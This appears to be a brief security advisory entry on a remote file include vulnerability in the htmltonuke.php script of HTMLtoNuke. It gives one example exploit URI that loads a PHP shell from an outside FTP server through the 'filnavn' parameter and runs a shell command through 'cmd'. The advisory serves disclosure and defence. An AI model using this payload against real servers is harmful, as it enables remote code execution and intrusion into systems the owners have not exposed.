• info
• discussion
• exploit
• solution
• references

HTMLtoNuke HTMLtonuke.PHP Remote File Include Vulnerability

An exploit is not required.

An example URI has been provided:

http://www.example.com/htmltonuke.php?filnavn=ftp://user:pass@ftpserver/phpshell.html&cmd=id